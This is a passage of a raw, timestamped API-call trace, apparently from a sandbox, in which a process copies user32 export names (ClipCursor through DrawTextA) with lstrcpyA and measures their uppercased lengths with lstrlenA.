lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ClipCursor" | out: lpString1="ClipCursor") returned="ClipCursor" [0053.574] lstrlenA (lpString="CLIPCURSOR") returned 10 [0053.574] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CloseClipboard" | out: lpString1="CloseClipboard") returned="CloseClipboard" [0053.574] lstrlenA (lpString="CLOSECLIPBOARD") returned 14 [0053.574] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CloseDesktop" | out: lpString1="CloseDesktop") returned="CloseDesktop" [0053.574] lstrlenA (lpString="CLOSEDESKTOP") returned 12 [0053.574] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CloseGestureInfoHandle" | out: lpString1="CloseGestureInfoHandle") returned="CloseGestureInfoHandle" [0053.574] lstrlenA (lpString="CLOSEGESTUREINFOHANDLE") returned 22 [0053.574] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CloseTouchInputHandle" | out: lpString1="CloseTouchInputHandle") returned="CloseTouchInputHandle" [0053.574] lstrlenA (lpString="CLOSETOUCHINPUTHANDLE") returned 21 [0053.575] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CloseWindow" | out: lpString1="CloseWindow") returned="CloseWindow" [0053.575] lstrlenA (lpString="CLOSEWINDOW") returned 11 [0053.575] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CloseWindowStation" | out: lpString1="CloseWindowStation") returned="CloseWindowStation" [0053.575] lstrlenA (lpString="CLOSEWINDOWSTATION") returned 18 [0053.575] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ConsoleControl" | out: lpString1="ConsoleControl") returned="ConsoleControl" [0053.575] lstrlenA (lpString="CONSOLECONTROL") returned 14 [0053.575] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="ControlMagnification" | out: lpString1="ControlMagnification") returned="ControlMagnification" [0053.575] lstrlenA (lpString="CONTROLMAGNIFICATION") returned 20 [0053.575] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CopyAcceleratorTableA" | out: lpString1="CopyAcceleratorTableA") returned="CopyAcceleratorTableA" [0053.575] lstrlenA (lpString="COPYACCELERATORTABLEA") returned 21 [0053.575] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CopyAcceleratorTableW" | out: lpString1="CopyAcceleratorTableW") returned="CopyAcceleratorTableW" [0053.575] lstrlenA (lpString="COPYACCELERATORTABLEW") returned 21 [0053.575] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CopyIcon" | out: lpString1="CopyIcon") returned="CopyIcon" [0053.575] lstrlenA (lpString="COPYICON") returned 8 [0053.575] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CopyImage" | out: lpString1="CopyImage") returned="CopyImage" [0053.575] lstrlenA (lpString="COPYIMAGE") returned 9 [0053.575] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CopyRect" | out: lpString1="CopyRect") returned="CopyRect" [0053.575] lstrlenA (lpString="COPYRECT") returned 8 [0053.575] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CountClipboardFormats" | out: lpString1="CountClipboardFormats") returned="CountClipboardFormats" [0053.575] lstrlenA (lpString="COUNTCLIPBOARDFORMATS") returned 21 [0053.575] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateAcceleratorTableA" | out: lpString1="CreateAcceleratorTableA") returned="CreateAcceleratorTableA" [0053.575] lstrlenA (lpString="CREATEACCELERATORTABLEA") returned 23 [0053.575] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateAcceleratorTableW" | out: lpString1="CreateAcceleratorTableW") returned="CreateAcceleratorTableW" [0053.575] lstrlenA (lpString="CREATEACCELERATORTABLEW") returned 23 [0053.575] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateCaret" | out: lpString1="CreateCaret") returned="CreateCaret" [0053.575] lstrlenA (lpString="CREATECARET") returned 11 [0053.575] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateCursor" | out: lpString1="CreateCursor") returned="CreateCursor" [0053.575] lstrlenA (lpString="CREATECURSOR") returned 12 [0053.575] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateDesktopA" | out: lpString1="CreateDesktopA") returned="CreateDesktopA" [0053.575] lstrlenA (lpString="CREATEDESKTOPA") returned 14 [0053.575] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateDesktopExA" | out: lpString1="CreateDesktopExA") returned="CreateDesktopExA" [0053.575] lstrlenA (lpString="CREATEDESKTOPEXA") returned 16 [0053.575] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateDesktopExW" | out: lpString1="CreateDesktopExW") returned="CreateDesktopExW" [0053.575] lstrlenA (lpString="CREATEDESKTOPEXW") returned 16 [0053.575] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateDesktopW" | out: lpString1="CreateDesktopW") returned="CreateDesktopW" [0053.575] lstrlenA (lpString="CREATEDESKTOPW") returned 14 [0053.575] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateDialogIndirectParamA" | out: lpString1="CreateDialogIndirectParamA") returned="CreateDialogIndirectParamA" [0053.575] lstrlenA (lpString="CREATEDIALOGINDIRECTPARAMA") returned 26 [0053.576] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateDialogIndirectParamAorW" | out: lpString1="CreateDialogIndirectParamAorW") returned="CreateDialogIndirectParamAorW" [0053.576] lstrlenA (lpString="CREATEDIALOGINDIRECTPARAMAORW") returned 29 [0053.576] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateDialogIndirectParamW" | out: lpString1="CreateDialogIndirectParamW") returned="CreateDialogIndirectParamW" [0053.576] lstrlenA (lpString="CREATEDIALOGINDIRECTPARAMW") returned 26 [0053.576] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateDialogParamA" | out: lpString1="CreateDialogParamA") returned="CreateDialogParamA" [0053.576] lstrlenA (lpString="CREATEDIALOGPARAMA") returned 18 [0053.576] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateDialogParamW" | out: lpString1="CreateDialogParamW") returned="CreateDialogParamW" [0053.576] lstrlenA (lpString="CREATEDIALOGPARAMW") returned 18 [0053.576] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateIcon" | out: lpString1="CreateIcon") returned="CreateIcon" [0053.576] lstrlenA (lpString="CREATEICON") returned 10 [0053.576] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateIconFromResource" | out: lpString1="CreateIconFromResource") returned="CreateIconFromResource" [0053.576] lstrlenA (lpString="CREATEICONFROMRESOURCE") returned 22 [0053.576] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateIconFromResourceEx" | out: lpString1="CreateIconFromResourceEx") returned="CreateIconFromResourceEx" [0053.576] lstrlenA (lpString="CREATEICONFROMRESOURCEEX") returned 24 [0053.576] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateIconIndirect" | out: lpString1="CreateIconIndirect") returned="CreateIconIndirect" [0053.576] lstrlenA (lpString="CREATEICONINDIRECT") returned 18 [0053.576] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateMDIWindowA" | out: lpString1="CreateMDIWindowA") returned="CreateMDIWindowA" [0053.576] lstrlenA (lpString="CREATEMDIWINDOWA") returned 16 [0053.576] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateMDIWindowW" | out: lpString1="CreateMDIWindowW") returned="CreateMDIWindowW" [0053.576] lstrlenA (lpString="CREATEMDIWINDOWW") returned 16 [0053.576] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateMenu" | out: lpString1="CreateMenu") returned="CreateMenu" [0053.576] lstrlenA (lpString="CREATEMENU") returned 10 [0053.576] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreatePopupMenu" | out: lpString1="CreatePopupMenu") returned="CreatePopupMenu" [0053.576] lstrlenA (lpString="CREATEPOPUPMENU") returned 15 [0053.576] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateSystemThreads" | out: lpString1="CreateSystemThreads") returned="CreateSystemThreads" [0053.576] lstrlenA (lpString="CREATESYSTEMTHREADS") returned 19 [0053.576] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateWindowExA" | out: lpString1="CreateWindowExA") returned="CreateWindowExA" [0053.576] lstrlenA (lpString="CREATEWINDOWEXA") returned 15 [0053.576] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateWindowExW" | out: lpString1="CreateWindowExW") returned="CreateWindowExW" [0053.576] lstrlenA (lpString="CREATEWINDOWEXW") returned 15 [0053.576] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateWindowStationA" | out: lpString1="CreateWindowStationA") returned="CreateWindowStationA" [0053.576] lstrlenA (lpString="CREATEWINDOWSTATIONA") returned 20 [0053.576] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CreateWindowStationW" | out: lpString1="CreateWindowStationW") returned="CreateWindowStationW" [0053.576] lstrlenA (lpString="CREATEWINDOWSTATIONW") returned 20 [0053.576] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CsrBroadcastSystemMessageExW" | out: lpString1="CsrBroadcastSystemMessageExW") returned="CsrBroadcastSystemMessageExW" [0053.576] lstrlenA (lpString="CSRBROADCASTSYSTEMMESSAGEEXW") returned 28 [0053.576] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="CtxInitUser32" | out: lpString1="CtxInitUser32") returned="CtxInitUser32" [0053.577] lstrlenA (lpString="CTXINITUSER32") returned 13 [0053.577] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeAbandonTransaction" | out: lpString1="DdeAbandonTransaction") returned="DdeAbandonTransaction" [0053.577] lstrlenA (lpString="DDEABANDONTRANSACTION") returned 21 [0053.577] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeAccessData" | out: lpString1="DdeAccessData") returned="DdeAccessData" [0053.577] lstrlenA (lpString="DDEACCESSDATA") returned 13 [0053.577] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeAddData" | out: lpString1="DdeAddData") returned="DdeAddData" [0053.577] lstrlenA (lpString="DDEADDDATA") returned 10 [0053.577] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeClientTransaction" | out: lpString1="DdeClientTransaction") returned="DdeClientTransaction" [0053.577] lstrlenA (lpString="DDECLIENTTRANSACTION") returned 20 [0053.577] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeCmpStringHandles" | out: lpString1="DdeCmpStringHandles") returned="DdeCmpStringHandles" [0053.577] lstrlenA (lpString="DDECMPSTRINGHANDLES") returned 19 [0053.577] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeConnect" | out: lpString1="DdeConnect") returned="DdeConnect" [0053.577] lstrlenA (lpString="DDECONNECT") returned 10 [0053.577] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeConnectList" | out: lpString1="DdeConnectList") returned="DdeConnectList" [0053.577] lstrlenA (lpString="DDECONNECTLIST") returned 14 [0053.577] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeCreateDataHandle" | out: lpString1="DdeCreateDataHandle") returned="DdeCreateDataHandle" [0053.577] lstrlenA (lpString="DDECREATEDATAHANDLE") returned 19 [0053.577] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeCreateStringHandleA" | out: lpString1="DdeCreateStringHandleA") returned="DdeCreateStringHandleA" [0053.577] lstrlenA (lpString="DDECREATESTRINGHANDLEA") returned 22 [0053.577] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeCreateStringHandleW" | out: lpString1="DdeCreateStringHandleW") returned="DdeCreateStringHandleW" [0053.577] lstrlenA (lpString="DDECREATESTRINGHANDLEW") returned 22 [0053.577] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeDisconnect" | out: lpString1="DdeDisconnect") returned="DdeDisconnect" [0053.577] lstrlenA (lpString="DDEDISCONNECT") returned 13 [0053.577] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeDisconnectList" | out: lpString1="DdeDisconnectList") returned="DdeDisconnectList" [0053.577] lstrlenA (lpString="DDEDISCONNECTLIST") returned 17 [0053.577] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeEnableCallback" | out: lpString1="DdeEnableCallback") returned="DdeEnableCallback" [0053.577] lstrlenA (lpString="DDEENABLECALLBACK") returned 17 [0053.577] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeFreeDataHandle" | out: lpString1="DdeFreeDataHandle") returned="DdeFreeDataHandle" [0053.577] lstrlenA (lpString="DDEFREEDATAHANDLE") returned 17 [0053.577] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeFreeStringHandle" | out: lpString1="DdeFreeStringHandle") returned="DdeFreeStringHandle" [0053.577] lstrlenA (lpString="DDEFREESTRINGHANDLE") returned 19 [0053.577] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeGetData" | out: lpString1="DdeGetData") returned="DdeGetData" [0053.577] lstrlenA (lpString="DDEGETDATA") returned 10 [0053.577] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeGetLastError" | out: lpString1="DdeGetLastError") returned="DdeGetLastError" [0053.577] lstrlenA (lpString="DDEGETLASTERROR") returned 15 [0053.577] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeGetQualityOfService" | out: lpString1="DdeGetQualityOfService") returned="DdeGetQualityOfService" [0053.577] lstrlenA (lpString="DDEGETQUALITYOFSERVICE") returned 22 [0053.578] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeImpersonateClient" | out: lpString1="DdeImpersonateClient") returned="DdeImpersonateClient" [0053.578] lstrlenA (lpString="DDEIMPERSONATECLIENT") returned 20 [0053.578] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeInitializeA" | out: lpString1="DdeInitializeA") returned="DdeInitializeA" [0053.578] lstrlenA (lpString="DDEINITIALIZEA") returned 14 [0053.578] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeInitializeW" | out: lpString1="DdeInitializeW") returned="DdeInitializeW" [0053.578] lstrlenA (lpString="DDEINITIALIZEW") returned 14 [0053.578] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeKeepStringHandle" | out: lpString1="DdeKeepStringHandle") returned="DdeKeepStringHandle" [0053.578] lstrlenA (lpString="DDEKEEPSTRINGHANDLE") returned 19 [0053.578] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeNameService" | out: lpString1="DdeNameService") returned="DdeNameService" [0053.578] lstrlenA (lpString="DDENAMESERVICE") returned 14 [0053.578] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdePostAdvise" | out: lpString1="DdePostAdvise") returned="DdePostAdvise" [0053.578] lstrlenA (lpString="DDEPOSTADVISE") returned 13 [0053.578] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeQueryConvInfo" | out: lpString1="DdeQueryConvInfo") returned="DdeQueryConvInfo" [0053.578] lstrlenA (lpString="DDEQUERYCONVINFO") returned 16 [0053.578] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeQueryNextServer" | out: lpString1="DdeQueryNextServer") returned="DdeQueryNextServer" [0053.578] lstrlenA (lpString="DDEQUERYNEXTSERVER") returned 18 [0053.578] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeQueryStringA" | out: lpString1="DdeQueryStringA") returned="DdeQueryStringA" [0053.578] lstrlenA (lpString="DDEQUERYSTRINGA") returned 15 [0053.578] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeQueryStringW" | out: lpString1="DdeQueryStringW") returned="DdeQueryStringW" [0053.578] lstrlenA (lpString="DDEQUERYSTRINGW") returned 15 [0053.578] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeReconnect" | out: lpString1="DdeReconnect") returned="DdeReconnect" [0053.578] lstrlenA (lpString="DDERECONNECT") returned 12 [0053.578] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeSetQualityOfService" | out: lpString1="DdeSetQualityOfService") returned="DdeSetQualityOfService" [0053.578] lstrlenA (lpString="DDESETQUALITYOFSERVICE") returned 22 [0053.578] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeSetUserHandle" | out: lpString1="DdeSetUserHandle") returned="DdeSetUserHandle" [0053.578] lstrlenA (lpString="DDESETUSERHANDLE") returned 16 [0053.578] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeUnaccessData" | out: lpString1="DdeUnaccessData") returned="DdeUnaccessData" [0053.578] lstrlenA (lpString="DDEUNACCESSDATA") returned 15 [0053.578] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DdeUninitialize" | out: lpString1="DdeUninitialize") returned="DdeUninitialize" [0053.578] lstrlenA (lpString="DDEUNINITIALIZE") returned 15 [0053.578] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DefDlgProcA" | out: lpString1="DefDlgProcA") returned="DefDlgProcA" [0053.578] lstrlenA (lpString="DEFDLGPROCA") returned 11 [0053.578] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DefDlgProcW" | out: lpString1="DefDlgProcW") returned="DefDlgProcW" [0053.578] lstrlenA (lpString="DEFDLGPROCW") returned 11 [0053.578] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DefFrameProcA" | out: lpString1="DefFrameProcA") returned="DefFrameProcA" [0053.578] lstrlenA (lpString="DEFFRAMEPROCA") returned 13 [0053.578] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DefFrameProcW" | out: lpString1="DefFrameProcW") returned="DefFrameProcW" [0053.579] lstrlenA (lpString="DEFFRAMEPROCW") returned 13 [0053.579] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DefMDIChildProcA" | out: lpString1="DefMDIChildProcA") returned="DefMDIChildProcA" [0053.579] lstrlenA (lpString="DEFMDICHILDPROCA") returned 16 [0053.579] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DefMDIChildProcW" | out: lpString1="DefMDIChildProcW") returned="DefMDIChildProcW" [0053.579] lstrlenA (lpString="DEFMDICHILDPROCW") returned 16 [0053.579] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DefRawInputProc" | out: lpString1="DefRawInputProc") returned="DefRawInputProc" [0053.579] lstrlenA (lpString="DEFRAWINPUTPROC") returned 15 [0053.579] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DefWindowProcA" | out: lpString1="DefWindowProcA") returned="DefWindowProcA" [0053.579] lstrlenA (lpString="DEFWINDOWPROCA") returned 14 [0053.579] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DefWindowProcW" | out: lpString1="DefWindowProcW") returned="DefWindowProcW" [0053.579] lstrlenA (lpString="DEFWINDOWPROCW") returned 14 [0053.579] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DeferWindowPos" | out: lpString1="DeferWindowPos") returned="DeferWindowPos" [0053.579] lstrlenA (lpString="DEFERWINDOWPOS") returned 14 [0053.579] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DeleteMenu" | out: lpString1="DeleteMenu") returned="DeleteMenu" [0053.579] lstrlenA (lpString="DELETEMENU") returned 10 [0053.579] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DeregisterShellHookWindow" | out: lpString1="DeregisterShellHookWindow") returned="DeregisterShellHookWindow" [0053.579] lstrlenA (lpString="DEREGISTERSHELLHOOKWINDOW") returned 25 [0053.579] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DestroyAcceleratorTable" | out: lpString1="DestroyAcceleratorTable") returned="DestroyAcceleratorTable" [0053.579] lstrlenA (lpString="DESTROYACCELERATORTABLE") returned 23 [0053.579] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DestroyCaret" | out: lpString1="DestroyCaret") returned="DestroyCaret" [0053.579] lstrlenA (lpString="DESTROYCARET") returned 12 [0053.579] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DestroyCursor" | out: lpString1="DestroyCursor") returned="DestroyCursor" [0053.579] lstrlenA (lpString="DESTROYCURSOR") returned 13 [0053.579] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DestroyIcon" | out: lpString1="DestroyIcon") returned="DestroyIcon" [0053.579] lstrlenA (lpString="DESTROYICON") returned 11 [0053.579] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DestroyMenu" | out: lpString1="DestroyMenu") returned="DestroyMenu" [0053.579] lstrlenA (lpString="DESTROYMENU") returned 11 [0053.579] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DestroyReasons" | out: lpString1="DestroyReasons") returned="DestroyReasons" [0053.579] lstrlenA (lpString="DESTROYREASONS") returned 14 [0053.579] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DestroyWindow" | out: lpString1="DestroyWindow") returned="DestroyWindow" [0053.579] lstrlenA (lpString="DESTROYWINDOW") returned 13 [0053.579] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DeviceEventWorker" | out: lpString1="DeviceEventWorker") returned="DeviceEventWorker" [0053.579] lstrlenA (lpString="DEVICEEVENTWORKER") returned 17 [0053.579] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DialogBoxIndirectParamA" | out: lpString1="DialogBoxIndirectParamA") returned="DialogBoxIndirectParamA" [0053.579] lstrlenA (lpString="DIALOGBOXINDIRECTPARAMA") returned 23 [0053.579] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DialogBoxIndirectParamAorW" | out: lpString1="DialogBoxIndirectParamAorW") returned="DialogBoxIndirectParamAorW" [0053.579] lstrlenA (lpString="DIALOGBOXINDIRECTPARAMAORW") returned 26 [0053.579] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DialogBoxIndirectParamW" | out: lpString1="DialogBoxIndirectParamW") returned="DialogBoxIndirectParamW" [0053.580] lstrlenA (lpString="DIALOGBOXINDIRECTPARAMW") returned 23 [0053.580] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DialogBoxParamA" | out: lpString1="DialogBoxParamA") returned="DialogBoxParamA" [0053.580] lstrlenA (lpString="DIALOGBOXPARAMA") returned 15 [0053.580] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DialogBoxParamW" | out: lpString1="DialogBoxParamW") returned="DialogBoxParamW" [0053.580] lstrlenA (lpString="DIALOGBOXPARAMW") returned 15 [0053.580] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DisableProcessWindowsGhosting" | out: lpString1="DisableProcessWindowsGhosting") returned="DisableProcessWindowsGhosting" [0053.580] lstrlenA (lpString="DISABLEPROCESSWINDOWSGHOSTING") returned 29 [0053.580] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DispatchMessageA" | out: lpString1="DispatchMessageA") returned="DispatchMessageA" [0053.580] lstrlenA (lpString="DISPATCHMESSAGEA") returned 16 [0053.580] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DispatchMessageW" | out: lpString1="DispatchMessageW") returned="DispatchMessageW" [0053.580] lstrlenA (lpString="DISPATCHMESSAGEW") returned 16 [0053.580] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DisplayConfigGetDeviceInfo" | out: lpString1="DisplayConfigGetDeviceInfo") returned="DisplayConfigGetDeviceInfo" [0053.580] lstrlenA (lpString="DISPLAYCONFIGGETDEVICEINFO") returned 26 [0053.580] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DisplayConfigSetDeviceInfo" | out: lpString1="DisplayConfigSetDeviceInfo") returned="DisplayConfigSetDeviceInfo" [0053.580] lstrlenA (lpString="DISPLAYCONFIGSETDEVICEINFO") returned 26 [0053.580] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DisplayExitWindowsWarnings" | out: lpString1="DisplayExitWindowsWarnings") returned="DisplayExitWindowsWarnings" [0053.580] lstrlenA (lpString="DISPLAYEXITWINDOWSWARNINGS") returned 26 [0053.580] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DlgDirListA" | out: lpString1="DlgDirListA") returned="DlgDirListA" [0053.580] lstrlenA (lpString="DLGDIRLISTA") returned 11 [0053.580] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DlgDirListComboBoxA" | out: lpString1="DlgDirListComboBoxA") returned="DlgDirListComboBoxA" [0053.580] lstrlenA (lpString="DLGDIRLISTCOMBOBOXA") returned 19 [0053.580] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DlgDirListComboBoxW" | out: lpString1="DlgDirListComboBoxW") returned="DlgDirListComboBoxW" [0053.580] lstrlenA (lpString="DLGDIRLISTCOMBOBOXW") returned 19 [0053.580] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DlgDirListW" | out: lpString1="DlgDirListW") returned="DlgDirListW" [0053.580] lstrlenA (lpString="DLGDIRLISTW") returned 11 [0053.580] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DlgDirSelectComboBoxExA" | out: lpString1="DlgDirSelectComboBoxExA") returned="DlgDirSelectComboBoxExA" [0053.580] lstrlenA (lpString="DLGDIRSELECTCOMBOBOXEXA") returned 23 [0053.580] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DlgDirSelectComboBoxExW" | out: lpString1="DlgDirSelectComboBoxExW") returned="DlgDirSelectComboBoxExW" [0053.580] lstrlenA (lpString="DLGDIRSELECTCOMBOBOXEXW") returned 23 [0053.580] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DlgDirSelectExA" | out: lpString1="DlgDirSelectExA") returned="DlgDirSelectExA" [0053.580] lstrlenA (lpString="DLGDIRSELECTEXA") returned 15 [0053.580] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DlgDirSelectExW" | out: lpString1="DlgDirSelectExW") returned="DlgDirSelectExW" [0053.580] lstrlenA (lpString="DLGDIRSELECTEXW") returned 15 [0053.580] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DoSoundConnect" | out: lpString1="DoSoundConnect") returned="DoSoundConnect" [0053.580] lstrlenA (lpString="DOSOUNDCONNECT") returned 14 [0053.580] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DoSoundDisconnect" | out: lpString1="DoSoundDisconnect") returned="DoSoundDisconnect" [0053.580] lstrlenA (lpString="DOSOUNDDISCONNECT") returned 17 [0053.581] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DragDetect" | out: lpString1="DragDetect") returned="DragDetect" [0053.581] lstrlenA (lpString="DRAGDETECT") returned 10 [0053.581] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DragObject" | out: lpString1="DragObject") returned="DragObject" [0053.581] lstrlenA (lpString="DRAGOBJECT") returned 10 [0053.581] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawAnimatedRects" | out: lpString1="DrawAnimatedRects") returned="DrawAnimatedRects" [0053.581] lstrlenA (lpString="DRAWANIMATEDRECTS") returned 17 [0053.581] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawCaption" | out: lpString1="DrawCaption") returned="DrawCaption" [0053.581] lstrlenA (lpString="DRAWCAPTION") returned 11 [0053.581] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawCaptionTempA" | out: lpString1="DrawCaptionTempA") returned="DrawCaptionTempA" [0053.581] lstrlenA (lpString="DRAWCAPTIONTEMPA") returned 16 [0053.581] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawCaptionTempW" | out: lpString1="DrawCaptionTempW") returned="DrawCaptionTempW" [0053.581] lstrlenA (lpString="DRAWCAPTIONTEMPW") returned 16 [0053.581] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawEdge" | out: lpString1="DrawEdge") returned="DrawEdge" [0053.581] lstrlenA (lpString="DRAWEDGE") returned 8 [0053.581] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawFocusRect" | out: lpString1="DrawFocusRect") returned="DrawFocusRect" [0053.581] lstrlenA (lpString="DRAWFOCUSRECT") returned 13 [0053.581] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawFrame" | out: lpString1="DrawFrame") returned="DrawFrame" [0053.581] lstrlenA (lpString="DRAWFRAME") returned 9 [0053.581] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawFrameControl" | out: lpString1="DrawFrameControl") returned="DrawFrameControl" [0053.581] lstrlenA (lpString="DRAWFRAMECONTROL") returned 16 [0053.581] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawIcon" | out: lpString1="DrawIcon") returned="DrawIcon" [0053.581] lstrlenA (lpString="DRAWICON") returned 8 [0053.581] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawIconEx" | out: lpString1="DrawIconEx") returned="DrawIconEx" [0053.581] lstrlenA (lpString="DRAWICONEX") returned 10 [0053.581] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawMenuBar" | out: lpString1="DrawMenuBar") returned="DrawMenuBar" [0053.581] lstrlenA (lpString="DRAWMENUBAR") returned 11 [0053.581] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawMenuBarTemp" | out: lpString1="DrawMenuBarTemp") returned="DrawMenuBarTemp" [0053.581] lstrlenA (lpString="DRAWMENUBARTEMP") returned 15 [0053.581] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawStateA" | out: lpString1="DrawStateA") returned="DrawStateA" [0053.581] lstrlenA (lpString="DRAWSTATEA") returned 10 [0053.581] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawStateW" | out: lpString1="DrawStateW") returned="DrawStateW" [0053.581] lstrlenA (lpString="DRAWSTATEW") returned 10 [0053.581] lstrcpyA (in: lpString1=0xc9e4fc, lpString2="DrawTextA" | out: lpString1="DrawTextA") returned="DrawTextA" [0053.581] lstrlenA 